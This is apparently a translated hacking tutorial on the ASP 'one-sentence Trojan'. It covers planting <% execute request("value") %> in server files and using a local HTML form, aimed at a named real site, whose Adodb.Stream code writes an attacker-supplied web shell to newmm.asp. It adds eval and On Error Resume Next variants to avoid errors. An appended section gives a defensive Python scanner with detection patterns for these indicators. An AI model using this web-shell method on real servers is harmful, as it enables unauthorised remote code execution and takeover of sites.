Environments in which the one-sentence Trojan applies:
1. The Guest account on the server has write permission.
2. The database address is known and the database file has an .asa or .asp extension.
3. If the database is not an .asp or .asa file, the one-sentence statement can be inserted into an .asp file instead.
Principle of the one-sentence Trojan:
"One-sentence Trojan" server side (the ASP statement inserted into an ASP file on the remote server)
This is the ASP statement we want to insert into an ASP file on the server (not only a database file with an .asp suffix). When triggered, it receives the data the intruder submits through the client and executes it. The server-side code is <% execute request("value") %>, where "value" can be changed to any name you like.
"One-sentence Trojan" client side (a local HTML file whose form is submitted to that ASP file)
Used to submit control data to the server. The server assembles the submitted data into complete ASP statements and executes them; this is how the ASP Trojan file we need is generated.
Now assume that TEXT.ASP on the remote host already contains the <% execute request("value") %> statement. In ASP, <% execute ... %> executes whatever statement stands in place of the ellipsis, so if we send a carefully constructed statement it will be executed for us. Based on this idea, we can construct a local form with the following content (text after a ' is an annotation):
<form action="http://www.bkjia.com/TEXT.asp" method="post">
<textarea name="value" cols="120" rows="10">
Set lp = Server.CreateObject("Adodb.Stream")   ' create a Stream object
lp.Open                                        ' open it
lp.Type = 2                                    ' text mode
lp.CharSet = "gb2312"                          ' character set
lp.WriteText Request("newvalue")               ' take the content of the second form field
lp.SaveToFile Server.MapPath("newmm.asp"), 2   ' write it to newmm.asp; 2 means overwrite an existing file
lp.Close                                       ' close the object
Set lp = Nothing                               ' release the object
Response.Redirect "newmm.asp"                  ' switch to newmm.asp
</textarea>
<textarea name="newvalue" cols="120" rows="10">Add the Trojan content here</textarea><br>
<center><br>
<input type="submit" value="submit">
</center>
</form>
The form submits its content to TEXT.ASP on the remote host. Because TEXT.ASP contains <% execute request("value") %>, that statement executes the code we sent from the form. (The name of the first form field must be the same as the name inside <% execute request("value") %>; these two places must be identical.)
To be clear, we constructed two form fields. The code in the first field performs the file operation (it writes the content of the second field into the current directory as a file named newmm.asp). The second field, of course, holds the Trojan we want to write.
The specific section is as follows:
Set lp = Server.CreateObject("Adodb.Stream")   ' create a Stream object
lp.Open                                        ' open it
lp.Type = 2                                    ' text mode
lp.CharSet = "gb2312"                          ' character set
lp.WriteText Request("newvalue")               ' take the content of the second form field
lp.SaveToFile Server.MapPath("newmm.asp"), 2   ' write it to newmm.asp; 2 means overwrite an existing file
lp.Close                                       ' close the object
Set lp = Nothing                               ' release the object
Response.Redirect "newmm.asp"                  ' switch to newmm.asp
Here the name of the second form field must be the same as the newvalue in lp.WriteText Request("newvalue"); these two parts must match.
At this point, as long as the server grants write permission, the Trojan content submitted by your form is written to newmm.asp, and newmm.asp is our shell address.
Server errors:
Often, when we add the sentence to an ASP file, a Type Mismatch error occurs:
Script error detected at line 1.
Source line: execute request ("nettoo ")
Description: Type Mismatch: 'execute'
How can this problem be solved?
I have come up with a good solution: if I replace "execute" on the server side with "eval", there are no errors!
Also add a fault-tolerance statement to the one-sentence server side. It can then be inserted into any ASP file without the errors seen before:
<% On Error Resume Next: execute request("value") %>
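From the defender's side, the page describes three things worth looking for in ASP sources on a server: request input passed straight to execute or eval (including the eval and On Error Resume Next variants above), and an Adodb.Stream that writes request input to a file with SaveToFile. The scanner below is an added example, not code from the page; the sample files it runs over are constructed here and are not the page's files.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample ASP sources, keyed by a made-up file name (not files from the page).
SAMPLES: Dict[str, str] = {
    "text.asp": '<html><body>Hello</body></html>\n<% execute request ("value") %>\n',
    "tolerant.asp": '<% On Error Resume Next: eval request("value") %>\n',
    "dropper.asp": (
        'Set lp = Server.CreateObject("Adodb.Stream")\n'
        'lp.WriteText Request("newvalue")\n'
        'lp.SaveToFile Server.MapPath("newmm.asp"), 2\n'
    ),
    "clean.asp": '<% Dim name: name = Request("name")\nResponse.Write Server.HTMLEncode(name) %>\n',
}

# VBScript is case-insensitive and tolerates spaces inside the call, as in
# `execute request ("value")`, so the patterns do too.
EXEC_OF_REQUEST = re.compile(
    r"\b(execute|executeglobal|eval)\s*\(?\s*request\s*(\.\s*(form|querystring|item))?\s*\(", re.I)
STREAM_OBJECT = re.compile(r'createobject\s*\(\s*"adodb\.stream"', re.I)
WRITE_FROM_REQUEST = re.compile(r"\.\s*writetext\s+request\s*\(", re.I)
SAVE_TO_FILE = re.compile(r"\.\s*savetofile\b", re.I)


def scan_asp(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, finding) pairs for the indicators described on this page."""
    lines = source.splitlines()
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(lines, 1):
        if EXEC_OF_REQUEST.search(line):
            findings.append((lineno, "request input passed straight to execute/eval"))
    # The Adodb.Stream dropper spans several lines: object creation, WriteText from
    # request input and SaveToFile must all be present before it is reported.
    if (STREAM_OBJECT.search(source) and WRITE_FROM_REQUEST.search(source)
            and SAVE_TO_FILE.search(source)):
        save_line = next(i for i, l in enumerate(lines, 1) if SAVE_TO_FILE.search(l))
        findings.append((save_line, "Adodb.Stream writes request input to a server-side file"))
    return findings


def scan_all(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan every file and keep only those with findings."""
    return {name: f for name, src in files.items() if (f := scan_asp(src))}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        for lineno, what in hits:
            print(f"{name}:{lineno}: {what}")
```

A hit from the first rule is a strong signal on its own; the dropper rule is reported only when all three parts are present, since Adodb.Stream alone is common in legitimate file-handling code.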